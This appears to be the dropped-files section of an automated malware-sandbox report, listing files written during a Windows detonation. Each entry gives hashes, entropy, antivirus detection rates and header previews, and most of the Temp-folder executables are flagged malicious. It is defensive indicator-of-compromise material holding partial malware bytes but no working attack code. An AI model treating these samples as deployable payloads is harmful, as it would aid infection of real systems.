                                                                                                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF7C.tmp.dmp
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 11:29:26 2022, 0x1205a4 type
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):36668
                                                                                                                                                                                            Entropy (8bit):2.119750978682941
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:KulxjOs+oPOeh0kEHwyhZwqTm8TqsMRhhQRdZ1I/:vGeO9BEoZC/
                                                                                                                                                                                            MD5:D605C4F70774958E2547E6414FD4A784
                                                                                                                                                                                            SHA1:4EC2D2615AF2F97C7E6D177B1A415166360DD43C
                                                                                                                                                                                            SHA-256:5C38CA968F16D2BC4C57EC90E0B3D4563435E21F1ABB8A4C55D8A6943BAB491D
                                                                                                                                                                                            SHA-512:DE0D5112C7CC04651309A6406040955F27ADA781CB80157935E35E8579FC12AD48B9F7045B7705DB89ED06A4F037A7B83B6965D8D9CFEF9FDF127F8D3DB081A8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MDMP....... ........^.a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T.......h....^.a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC559.tmp.WERInternalMetadata.xml
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8392
                                                                                                                                                                                            Entropy (8bit):3.70325701546705
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:Rrl7r3GLNi7g6is06Yr8SUp8gmfyRSvpU+pDV89bqlsfYOm:RrlsNiM6y6YQSUygmfyRSvpyq+f4
                                                                                                                                                                                            MD5:32D09D1ABD420B614246EBA61BA9CFE8
                                                                                                                                                                                            SHA1:C5F78339CE65139BB7DF356B40A8AF1E9366D46F
                                                                                                                                                                                            SHA-256:142D5B3FAC8B1F050783F59D8971529DD62F71CC792194CFE041678238A2AD3D
                                                                                                                                                                                            SHA-512:EB46878449E623A991383FBA000D603EC444E71DFBA0F01BD3A53AEFC529C122C8A234EBEB27AB357C74E692A54118DB7E179ECC651210B83C08AF944989D999
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.6.0.<./.P.i.d.>.......
                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERC913.tmp.xml
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4685
                                                                                                                                                                                            Entropy (8bit):4.480601083768932
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:cvIwSD8zsnJgtWI9TLWSC8Bg8fm8M4Jt8qFFh+q8vx8ZZ1T/W2d:uITfJo6SN7JLhKQZ1T/W2d
                                                                                                                                                                                            MD5:A1F7CC4965649E691E2187A3A528262D
                                                                                                                                                                                            SHA1:90CDD28B76330D7F49F90456526597690D2E8BF2
                                                                                                                                                                                            SHA-256:F1086A6B524BC2AEBE8AB605F40C7A4EEACF3B94BC3EA1211B955A0B6CCEE28F
                                                                                                                                                                                            SHA-512:89AEB5281D2AAF618C254F27A34C9CED7A50E8617FB1A880DF30CDA538CF5A700D0BB8D4D7B263D9C86282883203AC77A66C7A0F4B3C9528A714A48344B3C33B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341880" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FA5C.exe.log
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):700
                                                                                                                                                                                            Entropy (8bit):5.346524082657112
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                            MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                            SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                            SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                            SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\7D38.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):905216
                                                                                                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8A6B.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):301056
                                                                                                                                                                                            Entropy (8bit):5.192330972647351
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                                                                            MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                            SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                                                                            SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                                                                            SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\95C6.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):320000
                                                                                                                                                                                            Entropy (8bit):6.68963832251392
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:03Oruhy9+2efARaYhqUc9xm1IQgUS1u2NG03OF:aOrm0JRzp0x/QgUp2N6
                                                                                                                                                                                            MD5:F768F4A81E8B87D6990895A35B8D7D6C
                                                                                                                                                                                            SHA1:D0E5C1E975EC41E222F99F7A235D85317A1BE3A7
                                                                                                                                                                                            SHA-256:164149035D4A3D2EDBA76C0601F6F83E04D45D7C057D221130C57FC9B13FD5B5
                                                                                                                                                                                            SHA-512:004DFFBFCF0F36E6C4A411D3D499F25D8441F98F465D1B8A704CE9E9004D2785604C15F96E33A9761DEFE4AE1454E84BD76DD5CAE1A3658EF14D301FE0B69720
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L......`............................ .............@.................................'.......................................T...(.......................................................................@...............D............................text............................... ..`.data...............................@....zas................................@....give...............................@....riyevol............................@....rsrc...............................@..@.reloc..XF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\96DB.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):373760
                                                                                                                                                                                            Entropy (8bit):6.990411328206368
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                                                            MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                                                            SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                                                            SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                                                            SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\A15C.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):356864
                                                                                                                                                                                            Entropy (8bit):7.848593493266229
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:v5aWbksiNTBiNg5/dEQECtD2YajndnU4aomwStqUJE0ra7yswH:v5atNTMNg5eQX2BdUcDStq+J4bwH
                                                                                                                                                                                            MD5:6E7430832C1C24C2BF8BE746F2FE583C
                                                                                                                                                                                            SHA1:158936951114B6A76D665935AD34F6581556FCDF
                                                                                                                                                                                            SHA-256:972D533E4DF0786799C0E7C914AA6C04870753C10757C5D58CD874B92A7F4739
                                                                                                                                                                                            SHA-512:79289323C1104F7483FAC9BF2BCAB5B3804C8F2315C8EDEA9D7C83C8B68B64473122F9B38627169D64A35A960A5F74A3364159CA9CB37B0A2B1BA1B41607A8C8
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\B3EB.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3576320
                                                                                                                                                                                            Entropy (8bit):7.9976863291960605
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                                                                                            MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                                                                                            SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                                                                                            SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                                                                                            SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\BBBC.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):905216
                                                                                                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\C487.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:MS-DOS executable
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):557664
                                                                                                                                                                                            Entropy (8bit):7.687250283474463
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                                                                                            MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                                                                                            SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                                                                                            SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                                                                                            SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\CF17.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):356864
                                                                                                                                                                                            Entropy (8bit):7.8500958922173165
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:P5aWbksiNTBQlCuchwPuVbIn97yYUdL6TVrp/LbU7LY6TzeWJwN:P5atNTqlCl84wJyYUpUrLbU9SWJwN
                                                                                                                                                                                            MD5:FEB8ADD569247306CB0271C907607238
                                                                                                                                                                                            SHA1:BB9353D602A82FF174AFE7574F4AFD6009E2A8B0
                                                                                                                                                                                            SHA-256:E7587776ADECF859E137E7AF3DA4B9B6FD9428E6F89CC48D3A63886D490BAACA
                                                                                                                                                                                            SHA-512:6F650A1D44A11B2205E59DC915E244AC43988C7AC32972280CC5C5CA1ED668B683C2B06F61AEF8D2E91CE1C83FC4E0788207023B6CA81372ACDB4935F0402689
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\CFE8.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):323072
                                                                                                                                                                                            Entropy (8bit):6.715654310492716
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LDKNqNHeJZentJavqabB5guxMOgOC9nfpL6P9KJ:LDRNHWsJdKDgXOgOYfpQU
                                                                                                                                                                                            MD5:E1AF41681888A847863EE17BD63450A0
                                                                                                                                                                                            SHA1:E03508E1D39121DD0263C5A734C1C6ED0E266AC1
                                                                                                                                                                                            SHA-256:AEED1BF32DF36AD3CCC929987DBD30E2B1836C267223614D3648B3027E23E1FE
                                                                                                                                                                                            SHA-512:1E4F8699884B43B06020469AE6BBE94F3744075595DE9EFAF868DD7AB5FB40DE89CF5CADA3E9EA6033F3316D09EA4B9B79837E6C9AD8742436C07FF1B86E65B1
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L....V._............................@.............@.........................................................................t...(.......................................................................@...............D............................text............................... ..`.data...............................@....sutala.............................@....buve...............................@....bobe...............................@....rsrc................"..............@..@.reloc..bF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\E2A6.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):320000
                                                                                                                                                                                            Entropy (8bit):6.689874466366023
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:rwbDZlpg+MKH0e+F4a3TCkh4hXfcAg4SzqHeBcgKl:rUZfgTKH014UBqhEAg4fHe
                                                                                                                                                                                            MD5:E4B33586BFDB5A9CD45F3038B8F4CCBD
                                                                                                                                                                                            SHA1:D9E825FCAB71C80BA1515BEDB40030840837D1B4
                                                                                                                                                                                            SHA-256:3BB8EF6EAEC03C54C6C517000575EF943577CA0A71E61FD29257786991306133
                                                                                                                                                                                            SHA-512:3A648A9F056588502191E531AF5BC19E57B802C5B6DB71DA9F6C9CACD4715726E0058D04C5597329338E930AED6B2A5FFD736C779F36CABCB8CAF6D509AEBE7B
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...-..`.........................................@.................................:=..........................................(.......................................................................@...............D............................text...~........................... ..`.data...............................@....tojid..............................@....vese...............................@....fikazap............................@....rsrc...............................@..@.reloc..XF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\FA5C.exe
                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:modified
                                                                                                                                                                                            Size (bytes):537088
                                                                                                                                                                                            Entropy (8bit):5.840438491186833
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                                                                            MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                            SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
